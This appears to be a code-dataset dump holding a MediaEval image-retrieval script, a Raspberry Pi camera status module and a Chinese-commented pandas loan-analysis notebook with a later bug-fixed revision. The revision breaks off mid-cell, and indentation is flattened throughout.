image_list = pd.read_csv(open("./Data2021/MediaEvalNewsImagesBatch04images.tsv", "r"), sep="\t")
texts = []
text_ids = []
for _, r in tqdm(text_list.iterrows(), desc="Loading texts"):
if not pd.isnull(r.text):
texts.append(r.title + ". " + r.text)
text_ids.append(r.articleID)
images = []
image_ids = []
for _, r in tqdm(image_list.iterrows(), desc="loading images"):
if not pd.isnull(r.imgFile) and os.path.exists(os.path.join("./Data2021/images", r.imgFile)):
img = Image.open(os.path.join("./Data2021/images", r.imgFile))
img = img.convert("RGB")
images.append(img)
image_ids.append(r.imgFile)
tp = pickle.load(open(args.tp, "rb"))
ctm = load_model(args.text_model, len(tp.vocab))
vctm = load_model(args.image_model, len(tp.vocab))
testing_dataset = tp.transform(text_for_contextual=texts)
img_model = SentenceTransformer('clip-ViT-B-32')
img_emb = img_model.encode(images, batch_size=128, convert_to_tensor=True, show_progress_bar=True)
img_emb = np.array(img_emb.cpu())
image_test_bow_embeddings = scipy.sparse.csr_matrix(np.zeros((len(img_emb), 1)))
image_testing_dataset = CTMDataset(X_contextual = img_emb, X_bow=image_test_bow_embeddings ,idx2token = testing_dataset.idx2token)
test_topic_dist = ctm.get_doc_topic_distribution(testing_dataset, n_samples=20)
v_test_topic_dist = vctm.get_doc_topic_distribution(image_testing_dataset, n_samples=20)
dist_sim = cosine_similarity(test_topic_dist, v_test_topic_dist)
model_type, n_topics = os.path.basename(args.text_model).split("_")[:2]
with open(model_type+"_"+n_topics+"_submission.csv", "w") as out:
for doc in tqdm(range(len(texts)), desc="Searching images"):
ind_sims = sorted([(s,i) for i, s in enumerate(dist_sim[doc])], reverse=True)
ind_sims = [i[1] for i in ind_sims]
img_ids = [image_ids[i] for i in ind_sims]
print(str(int(text_ids[doc]))+"\t"+"\t".join(img_ids), file=out) | make_submission.py | import argparse
import pandas as pd
from tqdm import tqdm
from PIL import Image
import numpy as np
from contextualized_topic_models.datasets.dataset import CTMDataset
from sklearn.metrics.pairwise import cosine_similarity
from utils import load_model
from sentence_transformers import SentenceTransformer, util
import pickle
import scipy
import numpy as np
import os
os.environ["TOKENIZERS_PARALLELISM"] = "false"
parser = argparse.ArgumentParser()
parser.add_argument("--text_model", type=str, required=True)
parser.add_argument("--image_model", type=str, required=True)
parser.add_argument("--tp", type=str, required=True)
args = parser.parse_args()
text_list = pd.read_csv(open("./Data2021/MediaEvalNewsImagesBatch04articles.tsv", "r"), sep="\t")
image_list = pd.read_csv(open("./Data2021/MediaEvalNewsImagesBatch04images.tsv", "r"), sep="\t")
texts = []
text_ids = []
for _, r in tqdm(text_list.iterrows(), desc="Loading texts"):
if not pd.isnull(r.text):
texts.append(r.title + ". " + r.text)
text_ids.append(r.articleID)
images = []
image_ids = []
for _, r in tqdm(image_list.iterrows(), desc="loading images"):
if not pd.isnull(r.imgFile) and os.path.exists(os.path.join("./Data2021/images", r.imgFile)):
img = Image.open(os.path.join("./Data2021/images", r.imgFile))
img = img.convert("RGB")
images.append(img)
image_ids.append(r.imgFile)
tp = pickle.load(open(args.tp, "rb"))
ctm = load_model(args.text_model, len(tp.vocab))
vctm = load_model(args.image_model, len(tp.vocab))
testing_dataset = tp.transform(text_for_contextual=texts)
img_model = SentenceTransformer('clip-ViT-B-32')
img_emb = img_model.encode(images, batch_size=128, convert_to_tensor=True, show_progress_bar=True)
img_emb = np.array(img_emb.cpu())
image_test_bow_embeddings = scipy.sparse.csr_matrix(np.zeros((len(img_emb), 1)))
image_testing_dataset = CTMDataset(X_contextual = img_emb, X_bow=image_test_bow_embeddings ,idx2token = testing_dataset.idx2token)
test_topic_dist = ctm.get_doc_topic_distribution(testing_dataset, n_samples=20)
v_test_topic_dist = vctm.get_doc_topic_distribution(image_testing_dataset, n_samples=20)
dist_sim = cosine_similarity(test_topic_dist, v_test_topic_dist)
model_type, n_topics = os.path.basename(args.text_model).split("_")[:2]
with open(model_type+"_"+n_topics+"_submission.csv", "w") as out:
for doc in tqdm(range(len(texts)), desc="Searching images"):
ind_sims = sorted([(s,i) for i, s in enumerate(dist_sim[doc])], reverse=True)
ind_sims = [i[1] for i in ind_sims]
img_ids = [image_ids[i] for i in ind_sims]
print(str(int(text_ids[doc]))+"\t"+"\t".join(img_ids), file=out) | 0.144752 | 0.155463 |
from cam_status import cputemp
from cam_status import temp_sensor
import time
from datetime import timedelta
from uptime import uptime
import os
import psutil
import subprocess
import re
import shutil
def time_string(include_timezone):
if include_timezone:
return time.strftime('%Y-%m-%d %H:%M:%S %Z')
else:
return time.strftime('%Y-%m-%d %H:%M:%S')
def sys_uptime():
current_uptime = timedelta(seconds=round(uptime()))
result = ''
if current_uptime.days > 0:
result = f'{current_uptime.days}d '
hours, remainder = divmod(current_uptime.seconds, 3600)
minutes, seconds = divmod(remainder, 60)
result += f'{hours:02}:{minutes:02}:{seconds:02}'
return result
def load_avg():
return os.getloadavg()
def cpu():
return round(psutil.cpu_percent())
def ram_used():
meminfo = psutil.virtual_memory()
return round(meminfo.used / (1024 * 1024))
def ram_free():
meminfo = psutil.virtual_memory()
free = round(meminfo.free / (1024 * 1024))
cached = round(meminfo.cached / (1024 * 1024))
return free + cached
def cpu_temp():
return cputemp.temperature
def case_temp():
result = -999
try:
result = temp_sensor.temperature
except:
pass
return result
def case_humidity():
result = -999
try:
result = temp_sensor.relative_humidity
except:
pass
return result
def wifi():
quality = 0
max_quality = 100
signal = 0
iwconfig = subprocess.run(['iwconfig', 'wlan0'], stdout=subprocess.PIPE).stdout.decode('utf-8')
pattern = re.compile('Link Quality=([0-9]*)/([0-9]*).*Signal level=([-0-9]*)')
values = pattern.search(iwconfig)
if values is not None:
quality = int(values.group(1))
max_quality = int(values.group(2))
signal = int(values.group(3))
quality_percent = (quality / max_quality) * 100
return (round(quality_percent), signal)
def camera_active():
streamer = subprocess.run(['pgrep', 'mjpg_streamer'], stdout=subprocess.PIPE).stdout.decode('utf-8')
return True if len(streamer) > 0 else False
def disk_space():
return shutil.disk_usage('/').free / 1073742000 | cam_pi/cam_status/cam_status.py | from cam_status import cputemp
from cam_status import temp_sensor
import time
from datetime import timedelta
from uptime import uptime
import os
import psutil
import subprocess
import re
import shutil
def time_string(include_timezone):
if include_timezone:
return time.strftime('%Y-%m-%d %H:%M:%S %Z')
else:
return time.strftime('%Y-%m-%d %H:%M:%S')
def sys_uptime():
current_uptime = timedelta(seconds=round(uptime()))
result = ''
if current_uptime.days > 0:
result = f'{current_uptime.days}d '
hours, remainder = divmod(current_uptime.seconds, 3600)
minutes, seconds = divmod(remainder, 60)
result += f'{hours:02}:{minutes:02}:{seconds:02}'
return result
def load_avg():
return os.getloadavg()
def cpu():
return round(psutil.cpu_percent())
def ram_used():
meminfo = psutil.virtual_memory()
return round(meminfo.used / (1024 * 1024))
def ram_free():
meminfo = psutil.virtual_memory()
free = round(meminfo.free / (1024 * 1024))
cached = round(meminfo.cached / (1024 * 1024))
return free + cached
def cpu_temp():
return cputemp.temperature
def case_temp():
result = -999
try:
result = temp_sensor.temperature
except:
pass
return result
def case_humidity():
result = -999
try:
result = temp_sensor.relative_humidity
except:
pass
return result
def wifi():
quality = 0
max_quality = 100
signal = 0
iwconfig = subprocess.run(['iwconfig', 'wlan0'], stdout=subprocess.PIPE).stdout.decode('utf-8')
pattern = re.compile('Link Quality=([0-9]*)/([0-9]*).*Signal level=([-0-9]*)')
values = pattern.search(iwconfig)
if values is not None:
quality = int(values.group(1))
max_quality = int(values.group(2))
signal = int(values.group(3))
quality_percent = (quality / max_quality) * 100
return (round(quality_percent), signal)
def camera_active():
streamer = subprocess.run(['pgrep', 'mjpg_streamer'], stdout=subprocess.PIPE).stdout.decode('utf-8')
return True if len(streamer) > 0 else False
def disk_space():
return shutil.disk_usage('/').free / 1073742000 | 0.253122 | 0.108566 |
# In[10]:
import numpy as np
import pandas as pd
loandata = pd.DataFrame(pd.read_excel('D:\data analysis\Data capture\loandata.xlsx'))
# In[11]:
loandata
# In[31]:
loandata.duplicated().value_counts()
# In[13]:
loandata.drop_duplicates()
# In[14]:
loandata['loan_amnt'].isnull().value_counts()
# In[15]:
loandata['annual_inc'].isnull().value_counts()
# In[16]:
loandata['loan_amnt'] = loandata['loan_amnt'].fillna(loandata['total_pymnt'] - loandata['total_rec_int']).astype(np.int64)
# In[18]:
loandata['annual_inc'] = loandata['annual_inc'].fillna(loandata['annual_inc'].mean())
# In[20]:
loandata['annual_inc']
# In[21]:
loandata['loan_status'].value_counts()
# In[27]:
loandata['emp_length'].apply(lambda x : x.isalpha())
# In[28]:
loandata['emp_length'].apply(lambda x : x.isalnum())
# In[29]:
loandata['emp_length'].apply(lambda x : x.isdigit())
# In[30]:
loandata.describe().astype(np.int64).T
# In[35]:
import numpy as np
import pandas as pd
loandata = pd.DataFrame(pd.read_excel('D:\data analysis\Data capture\loandata.xlsx'))
# In[36]:
loandata
# In[53]:
loandata.duplicated().value_counts()
# In[54]:
loandata.drop_duplicates()
# In[41]:
loandata.duplicated().value_counts()
# In[55]:
loandata
# In[44]:
loandata.drop_duplicates()
# In[45]:
loandata
# In[46]:
loandata['loan_amnt'].isnull().value_counts()
# In[47]:
loandata['annual_inc'].isnull().value_counts()
# In[58]:
loandata['loan_amnt']=loandata['loan_amnt'].fillna(loandata['total_pymnt']-loandata['total_rec_int'])
# In[59]:
loandata['annual_inc'] = loandata['annual_inc'].fillna(loandata['annual_inc'].mean())
# In[60]:
loandata['loan_status'].value_counts()
# In[65]:
loandata.describe().T
# In[66]:
loandata.replace([3.500000e+04,500.0],loandata['loan_amnt'].mean())
# In[67]:
loandata['loan_amnt'] = loandata['loan_amnt'].astype(np.int64)
# In[69]:
loandata['issue_d'] = pd.to_datetime(loandata['issue_d'])
# In[70]:
loandata.dtypes
# In[71]:
bins = [0,5,10,15,20]
group_names = ['A','B','C','D']
loandata['categories'] = pd.cut(loandata['open_acc'],bins,labels = group_names)
# In[72]:
loandata
# In[73]:
loandata = loandata.set_index('member_id')
# In[74]:
import numpy as np
import pandas as dp
loandata = pd.DataFrame(pd.read_excel('D:\data analysis\Data capture\loandata.xlsx'))
# In[75]:
loandata = loandata.set_index('member_id')
# In[77]:
loandata.head()
# In[78]:
loandata.ix[41000]
# In[79]:
loandata.ix[:,'emp_length']
# In[81]:
loandata.ix[41000,'emp_length']
# In[82]:
loandata.ix[[41000,41001],'loan_amnt']
# In[85]:
loandata.ix[[41000,41001],'loan_amnt'].sum()
# In[86]:
loandata.ix[41000,['loan_amnt','annual_inc']]
# In[87]:
loandata.ix[41000,['loan_data','annual_inc']].sum()
# In[88]:
loandata = loandata.set_index('issue_d')
# In[89]:
loandata
# In[93]:
loandata['2018']
# In[99]:
loandata['2018-03':'2018-05']
# In[101]:
loandata.resample('W',how=sum).head(10)
# In[102]:
loandata.resample('M',how = sum)
# In[103]:
loandata.resample('Q',how = sum)
# In[104]:
loandata.resample('A',how = sum)
# In[105]:
loandata['loan_amnt'].resample('M',how = sum).fillna(0)
# In[106]:
loandata[['loan_amnt','total_rec_int']].resample('M',how = [len,sum])
# In[107]:
loandata['2018-02':'2018-05'].resample('M',how = sum).fillna(0)
# In[108]:
loandata[loandata['loan_amnt'] > 5000].resample('M',how = sum).fillna(0)
# In[114]:
import numpy as np
import pandas as pd
import matplotlib.pyplot as plt
loandata = pd.DataFrame(pd.read_excel('D:\data analysis\Data capture\loandata.xlsx'))
# In[115]:
loandata = loandata.set_index('issue_d')
# In[112]:
loandata
# In[116]:
loan_plot = loandata['loan_amnt'].resample('M').fillna(0)
# In[117]:
import numpy as np
import pandas as pd
import matplotlib.pyplot as plt
loandata = pd.DataFrame(pd.read_excel('D:\data analysis\Data capture\loandata.xlsx'))
# In[119]:
loandata = loandata.set_index('issue_d')
# In[121]:
loandata
# In[122]:
loan_plot = loandata['loan_amnt'].resample('M').fillna(0)
# In[123]:
loan_plot = loandata['loan_amnt'].resample('M').fillna(0)
# In[124]:
loan_grade = loandata.groupby('grade')['loan_amnt'].agg(sum)
# In[125]:
plt.rc('font',family = 'STXihei',size = 15)
# In[126]:
a = np.array([1,2,3,4,5,6])
# In[133]:
plt.bar([1,2,3,4,5,6,7],loan_grade,color='#99CC01',alpha=0.8,align='center',edgecolor='white')
plt.xlabel('用户等级')
plt.ylabel('贷款金额')
plt.title('不同用户等级的贷款金额分布')
plt.legend(['贷款金额'],loc = 'upper right')
plt.grid(color = '#95a5a6',linestyle = '--',linewidth = 1,axis = 'y',alpha=0.4)
plt.xticks(a,('A级','B级','C级','D级','E级','F级','G级'))
plt.show()
# In[136]:
#图表字体为华文细黑,字号为15
plt.rc('font', family='STXihei', size=15)
#创建一个一维数组赋值给a
a=np.array([1,2,3,4,5,6])
#创建条形图,数据源为分等级贷款金额汇总,设置颜色,透明度和图表边框
plt.barh([1,2,3,4,5,6,7],loan_grade,color='#99CC01',alpha=0.8,align='center',edgecolor='white')
plt.xlabel('贷款金额')
plt.ylabel('用户等级')
plt.title('不同用户等级的贷款金额分布')
#添加图例,并设置在图表中的显示位置
plt.legend(['贷款金额'], loc='upper right')
#设置背景网格线的颜色,样式,尺寸和透明度
plt.grid(color='#95a5a6',linestyle='--', linewidth=1,axis='y',alpha=0.4)
#设置数据分类名称
plt.yticks(a,('A级','B级','C级','D级','E级','F级','G级'))
#显示图表
plt.show()
# In[142]:
#图表字体为华文细黑,字号为15
plt.rc('font', family='STXihei', size=15)
#设置饼图中每个数据分类的颜色
colors = ["#99CC01","#FFFF01","#0000FE","#FE0000","#A6A6A6","#D9E021"]
#设置饼图中每个数据分类的名称
name=['A级', 'B级', 'C级', 'D级', 'E级','F级','G级']
#创建饼图,设置分类标签,颜色和图表起始位置等
plt.pie(loan_grade,labels=name,colors=colors,explode=(0, 0, 0.15, 0, 0, 0,0),startangle=60,autopct='%1.1f%%')
#添加图表标题
plt.title('不同用户等级的贷款金额占比')
#添加图例,并设置显示位置
plt.legend(['A级','B级','C级','D级','E级','F级','G级'], loc='upper left')
#显示图表
plt.show()
# In[143]:
#按月汇总贷款金额,以0填充空值
loan_x=loandata['loan_amnt'].resample('M',how=sum).fillna(0)
#按月汇总利息金额,以0填充空值
loan_y=loandata['total_rec_int'].resample('M',how=sum).fillna(0)
#图表字体为华文细黑,字号为15
plt.rc('font', family='STXihei', size=15)
#创建散点图,贷款金额为x,利息金额为y,设置颜色,标记点样式和透明度等
plt.scatter(loan_x,loan_y,60,color='white',marker='o',edgecolors='#0D8ECF',linewidth=3,alpha=0.8)
#添加x轴标题
plt.xlabel('贷款金额')
#添加y轴标题
plt.ylabel('利息收入')
#添加图表标题
plt.title('贷款金额与利息收入')
#设置背景网格线的颜色,样式,尺寸和透明度
plt.grid(color='#95a5a6',linestyle='--', linewidth=1,axis='both',alpha=0.4)
#显示图表
plt.show()
# In[145]:
#按月汇总贷款金额及利息
loan_x=loandata['loan_amnt'].resample('M',how=sum).fillna(0)
loan_y=loandata['total_rec_int'].resample('M',how=sum).fillna(0)
loan_z=loandata['total_rec_int'].resample('M',how=sum).fillna(0)
#图表字体为华文细黑,字号为15
plt.rc('font', family='STXihei', size=15)
#设置气泡图颜色
colors = ["#99CC01","#FFFF01","#0000FE","#FE0000","#A6A6A6","#D9E021",'#FFF16E','#0D8ECF','#FA4D3D','#D2D2D2','#FFDE45','#9b59b6']
#创建气泡图贷款金额为x,利息金额为y,同时设置利息金额为气泡大小,并设置颜色透明度等。
plt.scatter(loan_x,loan_y,s=loan_z,color=colors,alpha=0.6)
#添加x轴标题
plt.xlabel('贷款金额')
#添加y轴标题
plt.ylabel('利息收入')
#添加图表标题
plt.title('贷款金额与利息收入')
#设置背景网格线的颜色,样式,尺寸和透明度
plt.grid(color='#95a5a6',linestyle='--', linewidth=1,axis='both',alpha=0.4)
#显示图表
plt.show()
# In[146]:
#图表字体为华文细黑,字号为15
plt.rc('font', family='STXihei', size=15)
#创建箱线图,数据源为贷款来源,设置横向显示
plt.boxplot(loandata['loan_amnt'],1,'rs',vert=False)
#添加x轴标题
plt.xlabel('贷款金额')
#添加图表标题
plt.title('贷款金额分布')
#设置背景网格线的颜色,样式,尺寸和透明度
plt.grid(color='#95a5a6',linestyle='--', linewidth=1,axis='both',alpha=0.4)
#显示图表
plt.show()
# In[147]:
#图表字体为华文细黑,字号为15
plt.rc('font', family='STXihei', size=15)
#创建直方图,数据源为贷款金额,将数据分为8等份显示,设置颜色和显示方式,透明度等
plt.hist(loandata['loan_amnt'],8,normed=1, histtype='stepfilled',facecolor='#99CC01', rwidth=0.9,alpha=0.6,edgecolor='white')
#添加x轴标题
plt.xlabel('贷款金额')
#添加y轴标题
plt.ylabel('概率')
#添加图表标题
plt.title('贷款金额概率密度')
#设置背景网格线的颜色,样式,尺寸和透明度
plt.grid(color='#95a5a6',linestyle='--', linewidth=1,axis='y',alpha=0.4)
#显示图表
plt.show()
# In[148]:
#导入机器学习KNN分析库
from sklearn.neighbors import KNeighborsClassifier
#导入交叉验证库
from sklearn import cross_validation
#导入数值计算库
import numpy as np
#导入科学计算库
import pandas as pd
#导入图表库
import matplotlib.pyplot as plt
# In[149]:
#读取并创建名为knn_data的数据表
knn_data=pd.DataFrame(pd.read_excel('D:\data analysis\Data capture\knn_data.xlsx'))
# In[150]:
#查看数据表前10行
knn_data.head(10)
# In[151]:
#Fully Paid数据集的x1
fully_paid_loan=knn_data.loc[(knn_data["loan_status"] == "Fully Paid"),["loan_amnt"]]
#Fully Paid数据集的y1
fully_paid_annual=knn_data.loc[(knn_data["loan_status"] == "Fully Paid"),["annual_inc"]]
#Charge Off数据集的x2
charged_off_loan=knn_data.loc[(knn_data["loan_status"] == "Charged Off"),["loan_amnt"]]
#Charge Off数据集的y2
charged_off_annual=knn_data.loc[(knn_data["loan_status"] == "Charged Off"),["annual_inc"]]
# In[152]:
#设置图表字体为华文细黑,字号15
plt.rc('font', family='STXihei', size=15)
#绘制散点图,Fully Paid数据集贷款金额x1,用户年收入y1,设置颜色,标记点样式和透明度等参数
plt.scatter(fully_paid_loan,fully_paid_annual,color='#9b59b6',marker='^',s=60)
#绘制散点图,Charge Off数据集贷款金额x2,用户年收入y2,设置颜色,标记点样式和透明度等参数
plt.scatter(charged_off_loan,charged_off_annual,color='#3498db',marker='o',s=60)
#添加图例,显示位置右上角
plt.legend(['Fully Paid', 'Charged Off'], loc='upper right')
#添加x轴标题
plt.xlabel('贷款金额')
#添加y轴标题
plt.ylabel('用户收入')
#添加图表标题
plt.title('贷款金额与用户收入')
#设置背景网格线颜色,样式,尺寸和透明度
plt.grid( linestyle='--', linewidth=0.2)
#显示图表
plt.show()
# In[153]:
#将贷款金额和用户收入设为自变量X
X = np.array(knn_data[['loan_amnt','annual_inc']])
#将贷款状态设为因变量Y
Y = np.array(knn_data['loan_status'])
# In[154]:
#查看自变量和因变量的行数
X.shape,Y.shape
# In[155]:
#将原始数据通过随机方式分割为训练集和测试集,其中测试集占比为40%
X_train, X_test, y_train, y_test = cross_validation.train_test_split(X, Y, test_size=0.4, random_state=0)
# In[156]:
#查看训练集数据的行数
X_train.shape,y_train.shape
# In[157]:
#将训练集代入到KNN模型中
clf = KNeighborsClassifier(n_neighbors=3)
clf.fit(X_train,y_train)
# In[158]:
#使用测试集衡量模型准确度
clf.score(X_test, y_test)
# In[159]:
#设置新数据,贷款金额5000,用户收入40000
new_data = np.array([[5000,40000]])
# In[160]:
#对新数据进行分类预测
clf.predict(new_data)
# In[161]:
#新数据属于每一个分类的概率
clf.classes_,clf.predict_proba(new_data) | LoanStats.py |
# In[10]:
import numpy as np
import pandas as pd
loandata = pd.DataFrame(pd.read_excel('D:\data analysis\Data capture\loandata.xlsx'))
# In[11]:
loandata
# In[31]:
loandata.duplicated().value_counts()
# In[13]:
loandata.drop_duplicates()
# In[14]:
loandata['loan_amnt'].isnull().value_counts()
# In[15]:
loandata['annual_inc'].isnull().value_counts()
# In[16]:
loandata['loan_amnt'] = loandata['loan_amnt'].fillna(loandata['total_pymnt'] - loandata['total_rec_int']).astype(np.int64)
# In[18]:
loandata['annual_inc'] = loandata['annual_inc'].fillna(loandata['annual_inc'].mean())
# In[20]:
loandata['annual_inc']
# In[21]:
loandata['loan_status'].value_counts()
# In[27]:
loandata['emp_length'].apply(lambda x : x.isalpha())
# In[28]:
loandata['emp_length'].apply(lambda x : x.isalnum())
# In[29]:
loandata['emp_length'].apply(lambda x : x.isdigit())
# In[30]:
loandata.describe().astype(np.int64).T
# In[35]:
# Second pass over the raw data (the notebook re-runs the load from scratch).
import numpy as np
import pandas as pd
# Raw string avoids invalid "\d"-style escapes in the Windows path.
loandata = pd.DataFrame(pd.read_excel(r'D:\data analysis\Data capture\loandata.xlsx'))

# In[36]:
loandata

# In[53]:
# Count duplicated vs. unique rows.
loandata.duplicated().value_counts()

# In[54]:
# BUG FIX: drop_duplicates() returns a new frame; the original discarded the
# result, so the deduplication was a no-op. Assign it back.
loandata = loandata.drop_duplicates()

# In[41]:
# Re-check: no duplicates should remain now.
loandata.duplicated().value_counts()

# In[55]:
loandata

# In[44]:
# Idempotent repeat of the dedup (kept from the original notebook flow),
# with the same assign-back fix.
loandata = loandata.drop_duplicates()

# In[45]:
loandata

# In[46]:
# Missing-value counts for loan amount and annual income.
loandata['loan_amnt'].isnull().value_counts()

# In[47]:
loandata['annual_inc'].isnull().value_counts()

# In[58]:
# Fill missing loan amounts with (total payment - total interest received).
loandata['loan_amnt']=loandata['loan_amnt'].fillna(loandata['total_pymnt']-loandata['total_rec_int'])

# In[59]:
# Fill missing annual income with the column mean.
loandata['annual_inc'] = loandata['annual_inc'].fillna(loandata['annual_inc'].mean())

# In[60]:
loandata['loan_status'].value_counts()

# In[65]:
loandata.describe().T

# In[66]:
# BUG FIX: replace() returns a new frame; the original discarded the result,
# so the two outlier values (35000 and 500) were never replaced by the mean.
# NOTE(review): this replaces the values in EVERY column, not just
# loan_amnt — confirm that is the intent.
loandata = loandata.replace([3.500000e+04,500.0],loandata['loan_amnt'].mean())

# In[67]:
# Cast loan amount to integer (NaNs were filled above).
loandata['loan_amnt'] = loandata['loan_amnt'].astype(np.int64)

# In[69]:
# Parse the issue date column into datetimes.
loandata['issue_d'] = pd.to_datetime(loandata['issue_d'])

# In[70]:
loandata.dtypes

# In[71]:
# Bin open_acc into four labelled categories:
# (0,5]=A, (5,10]=B, (10,15]=C, (15,20]=D.
bins = [0,5,10,15,20]
group_names = ['A','B','C','D']
loandata['categories'] = pd.cut(loandata['open_acc'],bins,labels = group_names)

# In[72]:
loandata

# In[73]:
# Index the frame by member id.
loandata = loandata.set_index('member_id')
# In[74]:
import numpy as np
# BUG FIX: the original read "import pandas as dp", but every call below uses
# the pd alias (it only worked because pd was imported earlier in the file).
import pandas as pd
loandata = pd.DataFrame(pd.read_excel(r'D:\data analysis\Data capture\loandata.xlsx'))

# In[75]:
# Index by member id for label-based row lookup.
loandata = loandata.set_index('member_id')

# In[77]:
loandata.head()

# FIX: DataFrame.ix was deprecated in pandas 0.20 and removed in 1.0;
# .loc is the label-based equivalent used throughout below.
# In[78]:
# Row for member 41000.
loandata.loc[41000]

# In[79]:
# All values of the emp_length column.
loandata.loc[:,'emp_length']

# In[81]:
# Single cell: emp_length of member 41000.
loandata.loc[41000,'emp_length']

# In[82]:
# Loan amounts of two members...
loandata.loc[[41000,41001],'loan_amnt']

# In[85]:
# ...and their sum.
loandata.loc[[41000,41001],'loan_amnt'].sum()

# In[86]:
# Two columns of one member.
loandata.loc[41000,['loan_amnt','annual_inc']]

# In[87]:
# BUG FIX: the original selected 'loan_data', which is not a column in this
# frame (presumably a typo for 'loan_amnt', matching the cell above).
loandata.loc[41000,['loan_amnt','annual_inc']].sum()

# In[88]:
# Re-index by issue date to enable date slicing and resampling.
loandata = loandata.set_index('issue_d')

# In[89]:
loandata

# In[93]:
# FIX: df['2018'] row selection by partial date string was removed from
# pandas; .loc is the supported spelling. All rows issued in 2018:
loandata.loc['2018']

# In[99]:
# Rows issued between March and May 2018 (inclusive slice).
loandata['2018-03':'2018-05']

# FIX: resample(..., how=...) is the pre-0.18 pandas API that has been
# removed; the .resample(...).sum() method chain is the supported form.
# NOTE(review): on recent pandas, summing a frame with non-numeric columns
# may need numeric_only=True — verify against the actual columns.
# In[101]:
# Weekly totals (first 10 weeks).
loandata.resample('W').sum().head(10)

# In[102]:
# Monthly totals.
loandata.resample('M').sum()

# In[103]:
# Quarterly totals.
loandata.resample('Q').sum()

# In[104]:
# Annual totals.
loandata.resample('A').sum()

# In[105]:
# Monthly loan-amount totals, empty months filled with 0.
loandata['loan_amnt'].resample('M').sum().fillna(0)

# In[106]:
# Monthly count and sum of loan amount and interest received.
# NOTE(review): the original used [len, sum]; 'count' excludes NaN where
# len did not — confirm NaNs were filled before relying on the counts.
loandata[['loan_amnt','total_rec_int']].resample('M').agg(['count', 'sum'])

# In[107]:
# Monthly totals restricted to Feb-May 2018.
loandata['2018-02':'2018-05'].resample('M').sum().fillna(0)

# In[108]:
# Monthly totals for loans above 5000.
loandata[loandata['loan_amnt'] > 5000].resample('M').sum().fillna(0)
# In[114]:
import numpy as np
import pandas as pd
import matplotlib.pyplot as plt
loandata = pd.DataFrame(pd.read_excel(r'D:\data analysis\Data capture\loandata.xlsx'))

# In[115]:
# Index by issue date for time-based resampling.
loandata = loandata.set_index('issue_d')

# In[112]:
loandata

# In[116]:
# Monthly loan-amount series for plotting; empty months become 0.
# FIX: the original called .resample('M').fillna(0) with no aggregation,
# which is incomplete; monthly sums are the evident intent (it matches the
# how=sum cells elsewhere in this file).
loan_plot = loandata['loan_amnt'].resample('M').sum().fillna(0)

# In[117]:
# (Duplicated notebook cells: the load and prep above are re-run verbatim.)
import numpy as np
import pandas as pd
import matplotlib.pyplot as plt
loandata = pd.DataFrame(pd.read_excel(r'D:\data analysis\Data capture\loandata.xlsx'))

# In[119]:
loandata = loandata.set_index('issue_d')

# In[121]:
loandata

# In[122]:
loan_plot = loandata['loan_amnt'].resample('M').sum().fillna(0)

# In[123]:
loan_plot = loandata['loan_amnt'].resample('M').sum().fillna(0)

# In[124]:
# Total loan amount per user grade (presumably grades A-G, 7 buckets —
# the charts below draw 7 bars/wedges).
loan_grade = loandata.groupby('grade')['loan_amnt'].agg(sum)

# In[125]:
# Chart font: STXihei ("华文细黑"), size 15.
plt.rc('font',family = 'STXihei',size = 15)

# In[126]:
# BUG FIX: the bar charts draw 7 bars but the tick array only had 6 entries
# while 7 labels were supplied, so the last label was silently dropped.
a = np.array([1,2,3,4,5,6,7])

# In[133]:
# Vertical bar chart of loan amount per grade.
plt.bar([1,2,3,4,5,6,7],loan_grade,color='#99CC01',alpha=0.8,align='center',edgecolor='white')
plt.xlabel('用户等级')
plt.ylabel('贷款金额')
plt.title('不同用户等级的贷款金额分布')
plt.legend(['贷款金额'],loc = 'upper right')
plt.grid(color = '#95a5a6',linestyle = '--',linewidth = 1,axis = 'y',alpha=0.4)
plt.xticks(a,('A级','B级','C级','D级','E级','F级','G级'))
plt.show()

# In[136]:
# Horizontal version of the same chart.
plt.rc('font', family='STXihei', size=15)
# BUG FIX: 7 tick positions for 7 bars (the original had 6 for 7 labels).
a=np.array([1,2,3,4,5,6,7])
plt.barh([1,2,3,4,5,6,7],loan_grade,color='#99CC01',alpha=0.8,align='center',edgecolor='white')
plt.xlabel('贷款金额')
plt.ylabel('用户等级')
plt.title('不同用户等级的贷款金额分布')
plt.legend(['贷款金额'], loc='upper right')
plt.grid(color='#95a5a6',linestyle='--', linewidth=1,axis='y',alpha=0.4)
plt.yticks(a,('A级','B级','C级','D级','E级','F级','G级'))
plt.show()

# In[142]:
# Pie chart of loan-amount share per grade.
plt.rc('font', family='STXihei', size=15)
# BUG FIX: only 6 colors were supplied for 7 wedges, so matplotlib recycled
# the first color for grade G; add a distinct 7th color.
colors = ["#99CC01","#FFFF01","#0000FE","#FE0000","#A6A6A6","#D9E021","#FFF16E"]
name=['A级', 'B级', 'C级', 'D级', 'E级','F级','G级']
# explode pulls the third (C-grade) wedge out; startangle rotates the first
# wedge; autopct prints one-decimal percentages.
plt.pie(loan_grade,labels=name,colors=colors,explode=(0, 0, 0.15, 0, 0, 0,0),startangle=60,autopct='%1.1f%%')
plt.title('不同用户等级的贷款金额占比')
plt.legend(['A级','B级','C级','D级','E级','F级','G级'], loc='upper left')
plt.show()
# In[143]:
# Monthly totals of loan amount (x) and interest received (y); empty
# months -> 0.
# FIX: resample(..., how=sum) is the pre-0.18 pandas API that has been
# removed; .resample('M').sum() is the supported spelling.
loan_x=loandata['loan_amnt'].resample('M').sum().fillna(0)
loan_y=loandata['total_rec_int'].resample('M').sum().fillna(0)
# Chart font: STXihei, size 15.
plt.rc('font', family='STXihei', size=15)
# Scatter of monthly loan amount vs. interest income: hollow markers
# (white fill) with a blue edge.
plt.scatter(loan_x,loan_y,60,color='white',marker='o',edgecolors='#0D8ECF',linewidth=3,alpha=0.8)
plt.xlabel('贷款金额')
plt.ylabel('利息收入')
plt.title('贷款金额与利息收入')
plt.grid(color='#95a5a6',linestyle='--', linewidth=1,axis='both',alpha=0.4)
plt.show()

# In[145]:
# Bubble chart: same x/y; the bubble size also encodes the interest amount.
loan_x=loandata['loan_amnt'].resample('M').sum().fillna(0)
loan_y=loandata['total_rec_int'].resample('M').sum().fillna(0)
# NOTE(review): loan_z deliberately duplicates loan_y — it is only used as
# the marker-size vector below.
loan_z=loandata['total_rec_int'].resample('M').sum().fillna(0)
plt.rc('font', family='STXihei', size=15)
# One color per month (12 entries).
colors = ["#99CC01","#FFFF01","#0000FE","#FE0000","#A6A6A6","#D9E021",'#FFF16E','#0D8ECF','#FA4D3D','#D2D2D2','#FFDE45','#9b59b6']
plt.scatter(loan_x,loan_y,s=loan_z,color=colors,alpha=0.6)
plt.xlabel('贷款金额')
